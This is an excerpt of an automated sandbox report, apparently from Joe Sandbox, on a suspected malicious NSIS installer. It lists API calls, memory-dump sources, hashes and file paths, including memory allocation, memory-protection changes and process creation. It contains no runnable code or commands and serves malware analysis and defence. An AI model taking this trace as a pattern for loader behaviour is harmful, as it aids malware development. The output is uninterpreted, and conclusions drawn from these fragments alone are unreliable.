                                  • Part of subcall function 6FC317F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FC31708,00000000), ref: 6FC3189A
                                  • Part of subcall function 6FC31F1E: wsprintfW.USER32 ref: 6FC31F51
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                 • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc$Librarywsprintf
                                • String ID:
                                • API String ID: 3962662361-0
                                • Opcode ID: c2efb31b0e0d282d17e84f3214f14eadbb574503e3cbf1e5bddd1f816a3b2339
                                • Instruction ID: 8321addc5d0c4073d43b60b4babdcec819e408cefae2037aa452eb5b288a5e29
                                • Opcode Fuzzy Hash: c2efb31b0e0d282d17e84f3214f14eadbb574503e3cbf1e5bddd1f816a3b2339
                                • Instruction Fuzzy Hash: 7541A533D043699FCB609F6CC844BDA37F8BB063E5F04441AF9595A182FB757549C690
                                APIs
                                • GlobalFree.KERNEL32(006B0850), ref: 00401D81
                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFreelstrcat
                                • String ID: Call
                                • API String ID: 238967769-1824292864
                                • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                APIs
                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                APIs
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 0040271D
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                APIs
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseDeleteValue
                                • String ID:
                                • API String ID: 2831762973-0
                                • Opcode ID: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction ID: 38e38bfe0db84342a76dd61cbaa190e5b367477f23a550be25d98ac167cb56e2
                                • Opcode Fuzzy Hash: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction Fuzzy Hash: D5F02433645600A7E310ABA49D4AA7E765DAF903A2F11053FF642A61C4CE7E8C46862D
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                APIs
                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425200,?), ref: 004066DA
                                • CloseHandle.KERNEL32(?), ref: 004066E7
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3712363035-0
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?), ref: 6FC32DD3
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                APIs
                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062A9
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                APIs
                                • VirtualProtect.KERNELBASE(6FC3501C,00000004,00000040,6FC35034), ref: 6FC31A68
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00424200,00000000,00000800,00424200,?,00406980,00000800,?,?,?,Call,00000000,00000000), ref: 004062D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00000000,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004066B1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425200,?), ref: 004066DA
                                  • Part of subcall function 004066B1: CloseHandle.KERNEL32(?), ref: 004066E7
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                  • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                • String ID:
                                • API String ID: 2972824698-0
                                APIs
                                • GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmp
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: AllocGlobal
                                • String ID:
                                • API String ID: 3761449716-0
                                • Opcode ID: fd622d6ba7d230c98449aebeedaa8a4d888be93f0ddce052b8910c03722eb48f
                                • Instruction ID: c1baa966c78e39c1a2a373b4f81a7cb76b77f95bd2635996ad8eb0b4f6327d1d
                                • Opcode Fuzzy Hash: fd622d6ba7d230c98449aebeedaa8a4d888be93f0ddce052b8910c03722eb48f
                                • Instruction Fuzzy Hash: 45B012F23004025FEE108718DE0AF303274F701355F000000F700D5040C12548208914
                                APIs
                                • GetDlgItem.USER32(?,000003F9), ref: 00404411
                                • GetDlgItem.USER32(?,00000408), ref: 0040441D
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404465
                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 0040447E
                                • SetWindowLongW.USER32(00000000,000000FC,Function_000058AB), ref: 00404495
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044AB
                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044BD
                                • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044D0
                                • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 004044DC
                                • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 004044EE
                                • DeleteObject.GDI32(00000000), ref: 004044F1
                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040451F
                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404529
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045D4
                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 004045FE
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404614
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404643
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404650
                                • ShowWindow.USER32(?,00000005), ref: 00404664
                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047A1
                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040481C
                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040483B
                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404867
                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040489C
                                • ImageList_Destroy.COMCTL32(?), ref: 004048C3
                                • GlobalFree.KERNEL32(?), ref: 004048D3
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                • String ID: M
                                • API String ID: 1688767230-3664761504
                                • Opcode ID: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction ID: 6b9816283df2d563a6f6303754403db0efd655586b529c1e8cba48373a45e4bc
                                • Opcode Fuzzy Hash: e527a44e3837e2842e9643811c94d438dc10ea4f06fb5cac42bc504d6044e278
                                • Instruction Fuzzy Hash: 4F12D0B1644301AFD3249F24DC45A2BB7E9EBC8314F10493EFA95E72E1DB789C428B59
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(00000000,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,00000001,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(00000000,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(00000000,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(00000000,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(00000000,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                APIs
                                • GetDlgItem.USER32(?,000003FB), ref: 004040B1
                                • SetWindowTextW.USER32(00000000,?), ref: 004040DB
                                  • Part of subcall function 00406A15: GetDlgItemTextW.USER32(?,?,00000400,00404F27), ref: 00406A28
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00406DB9
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$ItemText$PrevWindow
                                • String ID: A$C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising$Call
                                • API String ID: 4089110348-3627432768
                                • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                APIs
                                  • Part of subcall function 6FC312F8: GlobalAlloc.KERNELBASE(00000040,?,6FC311C4,-000000A0), ref: 6FC31302
                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FC3294E
                                • lstrcpyW.KERNEL32(00000008,?), ref: 6FC329A4
                                • lstrcpyW.KERNEL32(00000808,?), ref: 6FC329AF
                                • GlobalFree.KERNEL32(00000000), ref: 6FC329C0
                                • GlobalFree.KERNEL32(?), ref: 6FC32A44
                                • GlobalFree.KERNEL32(?), ref: 6FC32A4A
                                • GlobalFree.KERNEL32(?), ref: 6FC32A50
                                • GetModuleHandleW.KERNEL32(00000008), ref: 6FC32B1A
                                • LoadLibraryW.KERNEL32(00000008), ref: 6FC32B2B
                                • GetProcAddress.KERNEL32(?,?), ref: 6FC32B82
                                • lstrlenW.KERNEL32(00000808), ref: 6FC32B9D
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                • String ID:
                                • API String ID: 1042148487-0
                                • Opcode ID: 3e3e649ffa5568d9398132ef94c74d18899c4d022db021d9d989ff77da6219db
                                • Instruction ID: e04f1cc75c7e41a2d0afdfb7669f751df3c62d37f8d3f7e5c33643fdaa29224f
                                • Opcode Fuzzy Hash: 3e3e649ffa5568d9398132ef94c74d18899c4d022db021d9d989ff77da6219db
                                • Instruction Fuzzy Hash: 1C42AE73E487229FDB14CF39856069AB7E0FF89794F004A2EE599D6280F770E5448BD2
                                APIs
                                • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll, xrefs: 004024AC
                                • C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic, xrefs: 0040241F
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID: C:\Users\user\AppData\Local\Temp\identitetsproblemer\Mercerising\Trichoschistic$C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp\System.dll
                                • API String ID: 542301482-1344943116
                                • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                APIs
